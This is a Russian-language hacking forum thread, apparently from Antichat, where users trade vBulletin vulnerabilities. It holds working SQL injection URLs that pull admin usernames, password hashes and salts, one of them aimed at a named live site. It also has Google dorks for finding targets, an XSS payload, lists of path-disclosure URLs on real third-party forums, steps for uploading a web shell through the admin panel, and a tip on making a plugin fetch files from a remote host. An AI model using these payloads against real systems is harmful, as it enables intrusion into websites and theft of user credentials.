Форумы [Обзор уязвимостей vBulletin]

Discussion in 'Уязвимости CMS/форумов' started by bandera, 19 Aug 2006.

  1. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Обычно (90%) в нижнем углу написано "Администрирование".
    Клацните туда и попадете в админку.
     
  2. eman

    eman New Member

    Joined:
    7 Nov 2010
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Поправлю вас, "Управление"

    Может просто футер потерли, в целях безопастности.. а так, зайдите к пользователю в профиль, -> редактировать, откроеться админка (если прописана в config.php), или попробуйте выдать нарушение, откроеться модерка.. (только я не знаю, можно ли с модеркой дальше работать)
     
    1 person likes this.
  3. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    как я понял, в конфиге она не прописана :( Мб её вообще стерли нахер
     
  4. -morfiy-

    -morfiy- New Member

    Joined:
    8 Feb 2010
    Messages:
    33
    Likes Received:
    3
    Reputations:
    1
    зайдите под админом, дождитесь админа и посмотрите пути админки через "кто на сайте"
     
    2 people like this.
  5. eman

    eman New Member

    Joined:
    7 Nov 2010
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    vBulletin 4.1.10 Full Path Disclosure

    [Info]
    # Author: linc0ln.dll
    # Exploit Title: vBulletin 4.1.10 Full Path Disclosure
    # Date: 16/01/2012
    # Vendor or Software Link: http://www.vbulletin.com/# Category: WebApp
    # Version: 4.1.10
    # Contact: [email protected]
    # Website: linc6.wordpress.com
    # Greetings to: Mario_Vs | fir3 | fight3r | artii2 | pok3 | Upgreydd |VoltroN | amiugly | b00y4k4 |
    [Vulnerability]

    # Full Path Disclosure:

    demo
     
  6. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Написано же "Full Path Disclosure". Раскрытие пути к скрипту на сервере.
     
  7. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Активная XSS

    Уязвимы все версий

    Требуются права модератора

    Идём
    Панель модератора -> Управление разделами -> Объявление [Редактировать]

    Рабочий пример (проверка на работоспособность)
    Эксплуатация обычная

     
    2 people like this.
  8. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Америку открыл. Это не XSS, а фича. На ачате тоже работает.
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    если админ заходил в admincp до этого, то куки будут с админкой, правда они не долго живут.
     
    _________________________
    #129 yarbabin, 16 Mar 2012
    Last edited by a moderator: 25 Oct 2014
  10. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    В 4.1.4 тоже SQL-inj есть. Смотри Patchlevel в vbulletin_global.js. Если там просто "Vbulletin 4.1.4", то радуйся. А если рядом написано "Patchlevel n", то можешь др. способы искать.
     
    1 person likes this.
  11. pharm_all

    pharm_all Member

    Joined:
    10 Sep 2009
    Messages:
    106
    Likes Received:
    7
    Reputations:
    0
    vBulletin 4.1.7 => 4.1.10 XSS Vulnerability

    Vulnerability:
    1.
    Send New Private Message >
    >
    Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8)

    Watch the video: [http://vimeo.com/39049790]


    1337day.com/exploits/17824
     
  12. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    WAF мешает. Попробуй обойти.
     
    #132 Ereee, 29 Mar 2012
    Last edited by a moderator: 25 Oct 2014
  13. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Да нет вопросов
    Поехали
    EasyPage SQL-Injection​

    Google Dork: intext:"vbulletin" inurl:"page.php?p=" [Result: 18 000]

    File: /page.php
    PHP:
    [...]
    $pageid $_REQUEST['p'];
    [...]
        
    $page $vbulletin->db->query_first("
            SELECT *
            FROM " 
    TABLE_PREFIX "easy_pages
            WHERE varname = '
    $pageid'
            LIMIT 1
        "
    );
    [...]
    PoC:
    PHP:
    http://stavropolregion.com/page.php?p=stavrop%27%20and%201=2%20union%20select%201,2,3,%28select+concat_ws%280x3b,username,password,salt%29+from+user+where+usergroupid=6%20limit%201%29,5%20--%20f
    File: /admincp/easy_pages_admin.php
    PHP:
    [...]
    if (
    $_REQUEST['do'] == 'edit')
    {
        
    $pageid $_REQUEST['pageid'];
         
        
    $page $db->query_first("
            SELECT *
            FROM " 
    TABLE_PREFIX "easy_pages
            WHERE pageid = 
    $pageid
            LIMIT 1
        "
    );
    [...]
    PHP:
    [...]
    if (
    $_REQUEST['do'] == 'edit_update'){
     
    $title addslashes($_POST['title']);
    $varname addslashes($_POST['varname']);
    $content addslashes($_POST['content']);
     
                
    $vbulletin->db->query_write("UPDATE " TABLE_PREFIX "easy_pages
                                            SET title = '
    $title',
                                                                                            varname = '
    $varname',
                                                content = '
    $content',
                                                table_wrap = '" 
    $_POST['table_wrap'] . "'
                                                WHERE pageid = " 
    $_POST[pageid] . ";
                                        "
    );
     
        
    print_cp_redirect('easy_pages_admin.php');
    }
    [...]
    PHP:
    [...]
    if (
    $_REQUEST['do'] == 'add_update'){
     
    $title addslashes($_POST['title']);
    $content addslashes($_POST['content']);
    $varname addslashes($_POST['varname']);
                
    $vbulletin->db->query_write("INSERT INTO " TABLE_PREFIX "easy_pages
                                                  SET  title = '
    $title',
                                                                                            varname = '
    $varname',
                                                content = '
    $content',
                                                table_wrap = '" 
    $_POST['table_wrap'] . "'
                                        "
    );
     
     
        
    print_cp_redirect('easy_pages_admin.php');
    }
    [...]
    PHP:
    [...]
    if (
    $_REQUEST['do'] == 'delete_page'){
     
        
    $vbulletin->db->query_write("DELETE FROM " TABLE_PREFIX "easy_pages WHERE pageid = '" $_REQUEST['pageid'] . "' LIMIT 1");
     
        
    print_cp_redirect('easy_pages_admin.php');
         
    }
    [...]
    Было успешно найдено
    (c) Boolean, 0x0000ed.com, 2012.
    Было успешно взято
    (с) Grabberz.com
     
  14. In_flames

    In_flames New Member

    Joined:
    15 May 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    vBulletin 3.8.x

    PHP:
    $ibforums->input['s_id'] = ibp_cleansql$ibforums->input['s_id'] );
    Раскрытие путей

     
  15. Export

    Export Member

    Joined:
    13 Feb 2010
    Messages:
    69
    Likes Received:
    5
    Reputations:
    9
    Раскрытие путей в последней версии(4.2.0)
    Нужны как минимум права модера.
    Code:
    http://localhost/modcp/index.php?do[]=head
    https://localhost/modcp/index.php?do[]=home
     
  16. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Заливка шелла в 4.0.7 плюс\минус
    Требуется доступ в админку.

    HTML:
    Заходим в админку
    Продукты и модули -> Сохранить\загрузить модули
    Выбираем плагин-шелл (приложен снизу).
    Устанавливаем.
    Переходим в Коммерческая подписка -> Управление подпиской
    
    http://www.sendspace.com/file/rz0609
     
  17. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Exp.
    PHP:
    http://target.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql]
     
    _________________________
    1 person likes this.
  18. eman

    eman New Member

    Joined:
    7 Nov 2010
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability

    # Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection
    Vulnerability
    # Google Dork: No Dork
    # Date: 19/10/2012
    # Exploit Author: Juno_okyo
    # Vendor Homepage: http://hoiquantinhoc.com
    # Software Link:
    http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html
    # Version: vBulletin 3 & 4
    # Tested on: Windows 7
    # CVE : http://www.vbulletin.com/
    #
    ##############################################################################################
    Vulnerability:
    ##############################################################################################

    SQL Injection was found in ChangUonDyU Advanced Statistics.

    Query on ajax.php

    ##############################################################################################
    Exploitation:
    ##############################################################################################

    ajax.php?do=inforum&listforumid=100) UNION SELECT
    1,concat_ws(0x7c,user(),database(),version()),3,4,5,6,7,8,9,10-- -&result=20

    or:

    ajax.php?do=inforum&listforumid=100) UNION SELECT
    1,2,3,4,5,6,concat_ws(0x7c,username,password,salt),8,9,10,11 from user
    where userid=1-- -&result=20

    ##############################################################################################
    Ex:
    ##############################################################################################

    http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20


    ##############################################################################################
    More Details:
    ##############################################################################################

    Website: http://junookyo.blogspot.com/
    About Exploit:
    http://junookyo.blogspot.com/2012/10/vbb-changuondyu-advanced-statistics-sql.html

    ##############################################################################################
    Great thanks to James, Juno_okyo & J2TeaM, VNHack Group
    ##############################################################################################
     
  19. n0n@me

    n0n@me New Member

    Joined:
    19 Feb 2010
    Messages:
    4
    Likes Received:
    2
    Reputations:
    5
    vBulletin 4.2.0 Full Path Disclosure Vulnerability

    Code:
    The Full Path Disclosure is vBulletin 4.2.0, in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's username.    
    To see it go to:   http://[path]/forumrunner/include/album.php   
    It works in 90% of the forums.     
    
    Example: 
    http://www.mgcproducts.com/forumrunner/include/album.php http://atheistdiscussion.com/forumrunner/include/album.php http://apolyton.net/forumrunner/include/album.php http://www.romaniancommunity.net/forumrunner/include/album.php http://www.ghosthax.com/forumrunner/include/album.php http://www.reddotcity.net/forumrunner/include/album.php http://www.sevenskins.com/forum/forumrunner/include/album.php http://www.purevb.com/forumrunner/include/album.php http://forum.hackersbrasil.com.br/forumrunner/include/album.php
    vBulletin 4.x/5.x multiple Full Puth Disclosure Vuln

    Code:
    /includes/api/commonwhitelist_2.php 
    /includes/api/commonwhitelist_5.php 
    /includes/api/commonwhitelist_6.php 
    /includes/api/1/album_album.php 
    /includes/api/1/album_editalbum.php 
    /includes/api/1/album_latest.php 
    /includes/api/1/album_overview.php 
    /includes/api/1/album_picture.php 
    /includes/api/1/album_user.php 
    /includes/api/1/announcement_edit.php 
    /includes/api/1/announcement_view.php 
    /includes/api/1/api_cmscategorylist.php 
    /includes/api/1/api_cmssectionlist.php 
    /includes/api/1/api_forumlist.php 
    /includes/api/1/api_getnewtop.php 
    /includes/api/1/api_getsecuritytoken.php 
    /includes/api/1/api_getsessionhash.php 
    /includes/api/1/api_init.php 
    /includes/api/1/api_mobilepublisher.php 
    /includes/api/1/api_usersearch.php 
    /includes/api/1/blog_blog.php 
    /includes/api/1/blog_bloglist.php 
    /includes/api/1/blog_comments.php 
    /includes/api/1/blog_custompage.php 
    /includes/api/1/blog_dosendtofriend.php 
    /includes/api/1/blog_list.php 
    /includes/api/1/blog_members.php 
    /includes/api/1/blog_post_comment.php 
    /includes/api/1/blog_post_editblog.php 
    /includes/api/1/blog_post_editcomment.php 
    /includes/api/1/blog_post_edittrackback.php 
    /includes/api/1/blog_post_newblog.php 
    /includes/api/1/blog_post_postcomment.php 
    /includes/api/1/blog_post_updateblog.php 
    /includes/api/1/blog_sendtofriend.php 
    /includes/api/1/blog_subscription_entrylist.php 
    /includes/api/1/blog_subscription_userlist.php 
    /includes/api/1/blog_usercp_addcat.php 
    /includes/api/1/blog_usercp_editcat.php 
    /includes/api/1/blog_usercp_editoptions.php 
    /includes/api/1/blog_usercp_editprofile.php 
    /includes/api/1/blog_usercp_modifycat.php 
    /includes/api/1/blog_usercp_updateprofile.php 
    /includes/api/1/editpost_editpost.php 
    /includes/api/1/editpost_updatepost.php 
    /includes/api/1/forum.php 
    /includes/api/1/forumdisplay.php 
    /includes/api/1/inlinemod_domergeposts.php 
    /includes/api/1/list.php 
    /includes/api/1/login_lostpw.php 
    /includes/api/1/member.php 
    /includes/api/1/memberlist_search.php 
    /includes/api/1/misc_showattachments.php 
    /includes/api/1/misc_whoposted.php 
    /includes/api/1/newreply_newreply.php 
    /includes/api/1/newreply_postreply.php 
    /includes/api/1/newthread_postthread.php 
    /includes/api/1/newthread_newthread.php 
    /includes/api/1/poll_newpoll.php 
    /includes/api/1/poll_polledit.php 
    /includes/api/1/poll_showresults.php 
    /includes/api/1/private_editfolders.php
    /includes/api/1/private_insertpm.php 
    /includes/api/1/private_messagelist.php 
    /includes/api/1/private_newpm.php 
    /includes/api/1/private_showpm.php 
    /includes/api/1/private_trackpm.php 
    /includes/api/1/profile_editattachments.php 
    /includes/api/1/profile_editoptions.php 
    /includes/api/1/profile_editprofile.php 
    /includes/api/1/register_addmember.php 
    /includes/api/1/register_checkdate.php 
    /includes/api/1/search_process.php 
    /includes/api/1/search_showresults.php 
    /includes/api/1/showthread.php 
    /includes/api/1/subscription_addsubscription.php 
    /includes/api/1/subscription_editfolders.php 
    /includes/api/1/subscription_viewsubscription.php 
    /includes/api/1/threadtag_managetags.php 
    /includes/api/2/album_picture.php 
    /includes/api/2/api_blogcategorylist.php 
    /includes/api/2/blog_blog.php 
    /includes/api/2/blog_bloglist.php 
    /includes/api/2/blog_list.php 
    /includes/api/2/blog_subscription_entrylist.php 
    /includes/api/2/blog_subscription_userlist.php 
    /includes/api/2/blog_usercp_groups.php 
    /includes/api/2/content.php 
    /includes/api/2/editpost_editpost.php 
    /includes/api/2/forumdisplay.php 
    /includes/api/2/member.php 
    /includes/api/2/newreply_newreply.php 
    /includes/api/2/forum.php 
    /includes/api/2/poll_newpoll.php 
    /includes/api/2/poll_polledit.php 
    /includes/api/2/poll_showresults.php 
    /includes/api/2/private_messagelist.php 
    /includes/api/2/private_trackpm.php 
    /includes/api/2/profile_editattachments.php 
    /includes/api/2/search_showresults.php 
    /includes/api/2/showthread.php 
    /includes/api/3/api_gotonewpost.php 
    /includes/api/4/album_user.php 
    /includes/api/4/api_forumlist.php 
    /includes/api/4/api_getnewtop.php 
    /includes/api/4/breadcrumbs_create.php 
    /includes/api/4/facebook_getforumid.php 
    /includes/api/4/facebook_getnewforummembers.php 
    /includes/api/4/get_vbfromfacebook.php 
    /includes/api/4/login_facebook.php 
    /includes/api/4/newreply_postreply.php 
    /includes/api/4/newthread_postthread.php 
    /includes/api/4/register.php 
    /includes/api/4/register_addmember.php 
    /includes/api/4/search_findusers.php 
    /includes/api/4/subscription_viewsubscription.php 
    /includes/api/5/api_init.php 
    /includes/api/6/api_getnewtop.php 
    /includes/api/6/api_gotonewpost.php 
    /includes/api/6/content.php 
    /includes/api/6/member.php 
    /includes/api/6/newthread_newthread.php 
    /includes/block/blogentries.php 
    /includes/block/cmsarticles.php 
    /includes/block/html.php 
    /includes/block/newposts.php 
    /includes/block/sgdiscussions.php 
    /includes/block/tagcloud.php 
    /includes/block/threads.php 
    /forumrunner/include/subscriptions.php 
    /forumrunner/include/search_forum.php 
    /forumrunner/include/profile.php 
    /forumrunner/include/post.php 
    /forumrunner/include/pms.php 
    /forumrunner/include/online.php 
    /forumrunner/include/moderation.php 
    /forumrunner/include/misc.php 
    /forumrunner/include/login.php 
    /forumrunner/include/get_thread.php 
    /forumrunner/include/get_forum.php 
    /forumrunner/include/cms.php 
    /forumrunner/include/attach.php 
    /forumrunner/include/announcement.php 
    /forumrunner/include/album.php 
    /forumrunner/support/vbulletin_methods.php 
    /forumrunner/support/stringparser_bbcode.class.php 
    /forumrunner/support/utils.php 
    /forumrunner/support/other_methods.php 
    /packages/skimlinks/hooks/postbit_display_complete.php 
    /packages/skimlinks/hooks/showthread_complete.php 
    /packages/skimlinks/hooks/userdata_start.php 
    
    //...Leaked bY beBoss..//
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Сталкивался с такой фигнёй. Выкрутился тем, что изменил плагин на один из индексных при заходе на форум, а в качестве php кода указал не получение команд через GPC, а копирование файла с удалённого хоста в нужную папку.
     
    _________________________